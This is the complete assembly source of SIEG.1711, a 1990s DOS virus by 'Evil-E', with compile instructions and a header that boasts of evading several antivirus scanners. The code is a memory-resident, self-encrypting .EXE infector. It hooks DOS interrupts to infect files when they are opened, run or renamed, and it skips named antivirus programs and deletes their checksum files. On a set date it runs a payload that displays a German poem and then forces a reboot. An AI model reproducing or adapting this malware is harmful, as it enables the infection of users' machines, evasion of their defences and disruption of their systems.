; Virus SIEG.1711 by Evil-E ; ----------------------------------------------------------------------------- ; ; Created : 23.02.1996 ; ; Yep, your're right this is a pretty old virii from me. It's a fast .EXE ; infector. It infects on open, extended open, move/rename and execution of ; files. The virii knows some AV's like SCAN, TBAV, CLEAN, VSAFE, F-PROT, ; VIRSTOP, ANTIVIR and avoids to infect them. It also kills checksum files ; from MSAV. SIEG disables fast infection when F-PROT is run and enables it ; when it is exit. It doesn't infect EXE-overlays, Windows executeables and ; PKLITE compressed files. ; ; The virus includes a very nice payload that is executed on my birthday :-). ; Check it out ! ; ; It isn't detected by : ; - AVP Version 3.0 build 129 update: 20.03.1999 ; - Dr. Web 4.05b ; ; It is detected by: ; - F-PROT 3.04a as "could be infected with an unknown virus" :-( ; (F-PROT seems to have a hell good heuristic engine) ; ; Some comments in the source are in german, thats because I'm pretty lazy. ; On the other hand the VX-Scene has a lot of german speaking freaks nowadays ; (hi Serialkiller). ; ; Compiling instructions: ; tasm sieg /m3 ; tlink sieg ;------------------------------------------------------------------------------ P8086 MODEL Tiny Virus_Size EQU (Virus_End-Virus_Start) MemorySize EQU (Virus_Size/16)+8 Signature EQU 000h ImgLo EQU 002h ImgHi EQU 004h RelocItems EQU 006h HdrSize EQU 008h MinHeap EQU 00Ah MaxHeap EQU 00Ch StartSS EQU 00Eh StartSP EQU 010h Checksum EQU 012h StartIP EQU 014h StartCS EQU 016h Reloc EQU 018h HeaderSize EQU 020h CODESEG Virus_Start: mov si,00h ; delta offset mov bp,si add bp,offset decode cmp ds:[0],020CDh ; check for valid PSP je no_tracer mov ah,4ch int 21h no_tracer: push ds push si push es push cs pop ds mov cx,Virus_Size shr cx,1 add cx,si db 0BAh KEY Dw 0000h ent: sub ds:[bp],dx ; fucking lazy encryption engine inc bp inc bp loop Ent DECODE: ; "Are you there" -Call mov ax,09DE3h int 21h cmp bl,09Dh jne INSTALL jmp RESIDENT ; install into memory INSTALL: mov ax,es dec ax ; get MCB mov ds,ax mov bx,ds:[003h] mov ax,MemorySize sub ds:[012h],ax sub bx,ax mov ah,04ah int 21h mov ax,5800h ; Konzept der Speicherver- int 21h ; waltung lesen push ax mov bx,2h mov ax,5801h ; Suche von oben push ax int 21h mov bx,MemorySize-1 mov ah,48h int 21h mov es,ax dec ax mov ds,ax mov word ptr ds:[0001],8 xor di,di push cs pop ds mov cx,Virus_Size cld rep movsb ; copy into mem pop ax ; Setze altes Speicherkonzept pop bx int 21h ;get org. int 21h push es pop ds mov ax,3521h int 21h mov word ptr ds:[oldint21+2],es mov word ptr ds:[oldint21],bx ;set new int 21h mov ah,025h mov dx,offset newint21 int 21h Resident: pop es pop si pop ds mov ah,02Ah int 21h cmp dx,31Eh jne No_Payload ; my birthday ? mov dx,si jmp message No_Payload: ;restore EXE add si,offset segm mov ax,es add word ptr cs:[si],ax add word ptr cs:[si],010h cli mov ax,es add ax,10h db 005h Stack_seg dw 0 mov ss,ax db 0BCh SPP dw 0 sti sub ax,ax xor bx,bx sub cx,cx xor dx,dx sub di,di xor si,si sub bp,bp call dummy db 0EAh offs dw 00000h segm dw 0FFF0h dummy: ret Virus_Name db 00,"[SIEG!] by Evil-E",00 ; Payload :) Message: push cs pop ds mov ax,0001h ; 40x25x16 setzen int 10h inc ah mov cx,0ff01h int 10h mov ax,0B800h mov es,ax mov cx,19 mov bx,offset Scr_Ofs add bx,dx mov si,offset poem add si,dx Write_Poem: mov di,word ptr DS:[BX] next_z: lodsb or al,al mov ah,00 stosw jne next_z add bx,2 loop Write_Poem mov byte ptr es:[1],15 mov byte ptr es:[3],15 mov byte ptr es:[5],9 mov byte ptr es:[7],1 mov di,1 mov cx,40*25-1 Cycle: mov bx,6 E: mov al,es:[di+bx] add di,2 mov es:[di+bx],al sub bx,4 cmp bx,-6 jne E mov bx,3 lo: Mov DX,3dah wait1: in al,dx test al,8h jnz wait1 wait2: in al,dx test al,8h jz wait2 dec bx jnz lo sub di,4 loop cycle xor ax,ax ; wait till keypressed int 16h mov ds:[072],1234h ; Reboot db 0EAh dw 0000h dw 0FFFFh Scr_Ofs DW 024h,0AAh,0F6h,190h,1EAh,238h,280h,328h,372h,3c2h DW 418h,4b8h,506h,5ACh,5F8h,646h,694h,6E2h,73Ah poem Db "SIEG",0 Db "Wie oft hoerte ich dich sagen,",0 Db "Du wuerdest grosse Dinge wagen. -",0 Db "Wann, glaubst du, kommt der grosse Tag,",0 Db "Da endet alle Mueh' und Plag,",0 Db "Da du zu grossen Taten schreitest",0 Db "Und da du selbst dein Schicksal leitest?",0 Db "Und wieder ging ein Jahr vorbei,",0 Db "Doch nie warst du, mein Freund, dabei,",0 Db "Wenn's galt, nun endlich zuzugreifen,",0 Db "Damit auch Deine Fruechte reifen!",0 Db "Woran es liegt? Erklaer es nur!",0 Db "Du hattest Pech? Ach, keine Spur!",0 Db "Wie immer, einzig und allein",0 Db "Lag's nur an dir, an dir allein.",0 Db "Schau nur auf deine Haende bloss -",0 Db "Sie liegen schlaff in deinem Schoss",0 Db "Statt endlich, endlich doch zu handeln",0 Db "Und alles in dir umzuwandeln!",0 NEWINT24: Mov al,03h iret DATEIANFANG: mov ax,00h DateiEND: mov ah,42h xor cx,cx cwd int 21h ret DATEIENDE: Mov al,02h jmp dateiend OLDHANDLER: pushf call dword ptr CS:[oldint21] Ret EXEINF: mov ds:[fastBo],0 ; Fast Infection ON ; Speicherbedarf in Paragraphen „ndern mov cx,word ptr ds:[header+Maxheap] add word ptr ds:[header+Minheap],MemorySize+2 mov ax,word ptr ds:[header+Minheap] cmp ax,cx jb NO_INC mov ds:word ptr [header+Maxheap],ax No_INC: ;Altes STACK Segment sichern mov ax,word ptr ds:[header+StartSS] mov ds:[stack_seg],ax ;Alter SP sichern Mov ax,word ptr ds:[header+StartSP] mov ds:[spp],ax ;Alte Einsprungadresse speichern mov ax, word ptr ds:[header+StartCS] ;CS mov ds:[segm],ax mov ax,word ptr ds:[header+StartIP] ;IP mov ds:[offs],ax ; Schon infiziert Flag setzen mov ax,09DE3h mov word ptr ds:[header+Checksum],ax ;Gr”áe des Kopfes berechnen Mov si,word ptr ds:[header+HdrSize] mov cl,04h shl si,cl mov ax,sizeax mov dx,sizedx ;Kopf von Dateil„nge abziehen + Neuer CS:IP berechnen sub ax,si sbb dx,0 mov cx,010h div cx mov word ptr ds:[header+StartCS],ax mov word ptr ds:[header+StartSS],ax ; SS = CS mov word ptr ds:[Header+StartIP],dx mov ds:[001],dx add dx,offset OurStack ; Stackpointer setzen mov word ptr ds:[header+StartSP],dx ; +Virus mov ax,sizeax mov dx,sizedx add ax,Virus_Size adc dx,0h mov cx,200h div cx inc ax mov word ptr ds:[header+ImgLo],dx mov word ptr ds:[header+ImgHi],ax RET NEWINT21: cmp ax,09DE3h ; "Are you there" - Call jne NEXT mov bl,09Dh iret NEXT: cmp ax,4B00h ; Datei ausfhren je INFIZIERE cmp ah,04ch je FastON cmp cs:[fastBo],0 ; Wenn F-Prot geladen keine jne No_IN ; Fast-Infektion cmp ah,03dh ; Datei ”ffnen je infiziere cmp ah,043h ; Dateiatt. „ndern je infiziere cmp ah,056h ; Datei verschieben je infiziere cmp ah,06Ch ; Datei ”ffnen je Infiziere NO_IN: jmp dword ptr cs:[oldint21] ; Alten Handler aufrufen FastON: mov cs:[fastBO],0 jmp No_in INFIZIERE: pushf push ax push bx push cx push dx push si push di push ds push es push bp cmp ah,06Ch jne No_EXTENDED mov dx,si No_EXTENDED: mov si,dx No_End: lodsb cmp al,"." jne No_End cmp ds:[si-5],4353h ; "SC" ? - SCAN je E2 cmp ds:[si-5],4254h ; "TB" ? - TBAV je E2 cmp ds:[si-6],4C43h ; "CL" ? - CLEAN je E2 cmp ds:[si-6],5356h ; "VS" ? - VSAFE je e2 cmp ds:[si-7],2D46h ; "F-" ? - F-PROT je NO_Fast cmp ds:[si-8],4956h ; "VI" ? - VIRSTOP je E2 cmp ds:[si-8],4E41h ; "AN" ? - Antivir je e2 cmp ds:[si],534dh ; ".MS" ? - ChecksumDatei jne noCheck cmp ds:[si-2],5453h ; "ST.MS" jne NoCheck mov ah,041h ; Kill IT int 21h jmp e2 NoCheck: mov word ptr cs:[D_Off],dx mov word ptr cs:[D_Seg],ds mov di,dx xor dl,dl cmp byte ptr ds:[di+1],':' ; Ist 2 Zeichen ":" jne KEIN_LAUFWERK mov dl,ds:[di] and dl,01fh ; Laufwerknummer ermitteln KEIN_LAUFWERK: mov ah,036h int 21h cmp ax,-1 jne DO_EXIST E2: JMP ENDE NO_Fast: Mov cs:[FastBO],0FFh jmp ENDE DO_EXIST: MUL BX MUL CX OR DX,DX JNE SPACE_OK CMP AX,Virus_Size+256 JB ENDE SPACE_OK: ; Alten Int 24h speichern mov ax,3524h ; Alten INT 24h speichern int 21h push bx ; Offset von INT 24h auf Stack push es ; Segment von Int 24h auf Stack push cs pop ds ; Neuen Int 24h installieren mov ah,025h push ax mov dx,offset Newint24 int 21h mov dx,cs:[D_Off] ; Offset zum Dateinamen holen mov ds,cs:[D_Seg] ; Dateiattribute holen MOV AX,4300h call oldhandler push cx ;Dateiattributte l”schen+setzen mov ax,4301h XOR CX,CX call oldhandler JB WEITER ; Datei ”ffnen Mov ax,3d02h call oldhandler JNB OK WEITER: ; Alte Dateiattribute setzen pop cx ; Attr. mov dx,ds:[D_Off] mov ds,ds:[D_Seg] MOV AX,4301h call oldhandler pop ax ; AX=2524h pop ds pop dx int 21h ENDE: pop bp pop es pop ds pop di pop si pop dx pop cx pop bx pop ax popf jmp dword ptr cs:[oldint21] ; Alten Handler aufrufen OK: xchg bx,ax push cs pop ds ; Datum+Uhrzeit speichern mov ax,5700h int 21h push dx push cx ; Gr”áe feststellen call dateiende mov ds:[sizedx],dx mov ds:[sizeax],ax mov si,ax mov di,dx ; Kopf einlesen Call Dateianfang mov ah,03fh mov cx,headersize mov dx,offset header int 21h cmp si,4096 ; Datei <= 4096 jbe E3 ; EXE - Datei ? cmp word ptr ds:[header+Signature],05A4Dh jne E3 ; Schon infiziert ? mov ax,09DE3h CMP AX,word ptr ds:[Header+CHECKSUM] je E3 ; Overlay - Datei ? Mov ax,word ptr ds:[header+ImgHi] mov cx,512 mul cx add ax,word ptr ds:[header+ImgLo] sub ax,si sbb dx,di jnb OK2 E3: jmp E1 OK2: ; Windows - EXE Datei ? cmp word ptr ds:[header+Reloc],040h jb No_Win ; šberprfen ob eine Pklite - Datei cmp word ptr ds:[header+Reloc+6],04b50h jne e1 No_win: CALL EXEINF ; Zus„tzlichen Speicher anfordern push bx mov ax,5802h ; UMB Status holen int 21h push ax ; speichern mov al,03h push ax mov bx,1 ; UMB's einbeziehen int 21h mov ah,048h mov bx,MemorySize int 21h mov bp,ax pop ax pop bx pushf xor bh,bh int 21h popf pop bx jb e1 push bx ;Neuer Kopf schreiben Call Dateianfang mov ah,040h mov cx,headersize mov dx,offset header int 21h xor ah,ah int 1ah or dx,dx jnz Bigger inc dx Bigger: mov ds:[key],dx ; Schlssel Speichern Call Verschluesseln ; Verschlsseln pop bx ;Virus an Dateiende schreiben call dateiende push es pop ds mov ah,040h mov cx,Virus_Size xor dx,dx int 21h ; Speicher freigeben mov ah,049h int 21h E1: ; Datum+Uhrzeit wiederherstellen mov ax,5701h pop cx pop dx int 21h ; Datei schlieáen mov ah,03eh int 21h JMP Weiter Verschluesseln: ; Kopieren mov es,bp xor di,di xor si,si mov cx,Virus_Size rep movsb ; Verschlsseln mov bp,offset decode mov cx,Virus_Size shr cx,1 mov dx,ds:[key] Ver: add es:[bp],dx inc bp inc bp loop Ver ret VIRUS_END: Header DB Headersize DUP(?) d_Off DW 0 D_SEG DW 0 Oldint21 DD 0 sizedx DW 0 sizeax DW 0 IM DD 0 FastBo DB 0 stackSize DB 256 Dup(?) ourstack: END